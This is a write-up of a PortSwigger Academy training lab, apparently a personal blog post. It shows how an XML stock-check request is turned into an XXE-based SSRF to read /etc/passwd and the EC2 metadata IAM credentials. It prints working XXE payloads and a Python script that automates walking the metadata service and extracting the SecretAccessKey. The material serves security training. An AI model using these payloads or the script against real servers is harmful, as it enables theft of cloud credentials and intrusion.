Exploiting XXE to perform SSRF attacks
In this post we will walk step by step through how to solve Exploiting XXE to perform SSRF attacks on PortSwigger Academy. This lab's difficulty is Practitioner and it is the second lab in the XXE injection labs on PortSwigger.
Link to lab: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint at http://169.254.169.254.
To start the lab click the ‘Access the Lab’ button. A modern browser and either Burp Suite Community or Professional Edition is all we need to solve this lab.
As we begin the lab we encounter a shop page showcasing different products. It’s worth noting that the products may differ from the screenshot as PortSwigger Labs can vary the content with each lab session. So, don’t worry if your products look different.
Clicking on one of the products we can see an image of the product, a description, and the ability to check stock for a chosen store location.
Clicking the Check stock button returns a value indicating the number of units.
Viewing this HTTP request in Burp shows that the stock check sends its parameters (productId and storeId) to the server as an XML document rather than as form fields. A server-side XML parser that processes user-supplied XML is exactly what an XXE payload needs.
Using the same payload from the Exploiting XXE using external entities to retrieve files lab we can obtain the contents of /etc/passwd. The entity is referenced inside productId, so whatever the parser fetches is treated as the product ID and echoed back in the application's error message. If you are curious how the payload works I have detailed notes about it there as well.
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Payload [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck> <productId> &xxe; </productId> <storeId> 1 </storeId> </stockCheck>
We need to change file:///etc/passwd to http://169.254.169.254/latest/meta-data/iam/security-credentials/admin. Switching the entity from a file:// URL to an http:// URL is what turns the XXE into an SSRF: the request to the metadata service is made by the application server itself, which is why it can reach a link-local address that is unreachable from our browser. The way I found this was through this blog post, if you are interested. We just need to adjust ROLENAME to admin. If you do not know the role name, the metadata service returns a directory listing at each level, so you can start with http://169.254.169.254/ and append one path segment from each response until you reach the credentials.
This allows us to obtain the server’s IAM secret access key from the EC2 metadata endpoint using the following payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Payload [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck>
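The procedure above (inject an external entity into productId, read the reflected value, and walk the metadata listings one level at a time) as a small script. This is an added example, not code from the original post or from PortSwigger. It assumes the stock-check endpoint is POST /product/stock on the lab host and that the server reflects the expanded entity after the text "Invalid product ID: "; both are assumptions, and the in-memory metadata tree used for the offline run is constructed, with a made-up secret value.

```python
import json
import sys
import urllib.error
import urllib.request

METADATA_HOST = "http://169.254.169.254"
STOCK_PATH = "/product/stock"            # assumption: the lab's stock-check endpoint
REFLECT_MARKER = "Invalid product ID: "  # assumption: how the lab echoes the entity


def build_payload(url):
    """Stock-check XML with an external entity that the parser will fetch from url.
    The entity is referenced in <productId>, so the fetched body is reflected."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "{url}"> ]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


def reflected_value(body, marker=REFLECT_MARKER):
    """Pull the expanded entity out of the application's error message."""
    idx = body.find(marker)
    return None if idx < 0 else body[idx + len(marker):].strip()


def make_lab_fetcher(lab_base):
    """Return fetch(path) that retrieves METADATA_HOST + path via the XXE."""
    def fetch(path):
        data = build_payload(METADATA_HOST + path).encode()
        req = urllib.request.Request(
            lab_base.rstrip("/") + STOCK_PATH, data=data,
            headers={"Content-Type": "application/xml"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:   # the reflection arrives in a 4xx response
            body = err.read().decode(errors="replace")
        return reflected_value(body)
    return fetch


def looks_like_listing(text):
    """Metadata directories answer with one path segment per line; leaves
    (JSON credential documents, hostnames with dots, etc.) do not."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    return bool(lines) and all(" " not in ln and not ln.startswith("{") for ln in lines)


def walk_metadata(fetch, path="/", max_depth=8):
    """Depth-first walk from path; returns {leaf_path: content}."""
    found = {}
    content = fetch(path)
    if content is None or max_depth < 0:
        return found
    if not looks_like_listing(content):
        found[path] = content
        return found
    for name in content.splitlines():
        name = name.strip().rstrip("/")
        if name:
            found.update(walk_metadata(fetch, path.rstrip("/") + "/" + name, max_depth - 1))
    return found


def extract_secret(found):
    """Return (path, SecretAccessKey) for the first JSON leaf that carries one."""
    for path, content in found.items():
        try:
            doc = json.loads(content)
        except ValueError:
            continue
        if isinstance(doc, dict) and "SecretAccessKey" in doc:
            return path, doc["SecretAccessKey"]
    return None


# Constructed stand-in for the lab's metadata service so the walk runs offline.
FAKE_METADATA = {
    "/": "latest",
    "/latest": "meta-data",
    "/latest/meta-data": "iam",
    "/latest/meta-data/iam": "security-credentials",
    "/latest/meta-data/iam/security-credentials": "admin",
    "/latest/meta-data/iam/security-credentials/admin":
        '{"Code":"Success","AccessKeyId":"AKIAEXAMPLE","SecretAccessKey":"EXAMPLE-SECRET-KEY"}',
}


def make_fake_fetcher(tree=FAKE_METADATA):
    return lambda path: tree.get(path)


if __name__ == "__main__":
    # python xxe_ssrf.py https://<lab-id>.web-security-academy.net
    fetch = make_lab_fetcher(sys.argv[1]) if len(sys.argv) > 1 else make_fake_fetcher()
    print(extract_secret(walk_metadata(fetch)))
```

Run it with the lab URL as the only argument to walk the real metadata service through the XXE; with no argument it walks the constructed tree. The depth limit stops the walk if a response happens to look like a listing of itself.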
The response reflects the JSON credentials document, including the SecretAccessKey. After obtaining the IAM secret access key we have successfully solved the lab!
That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!
Jarrod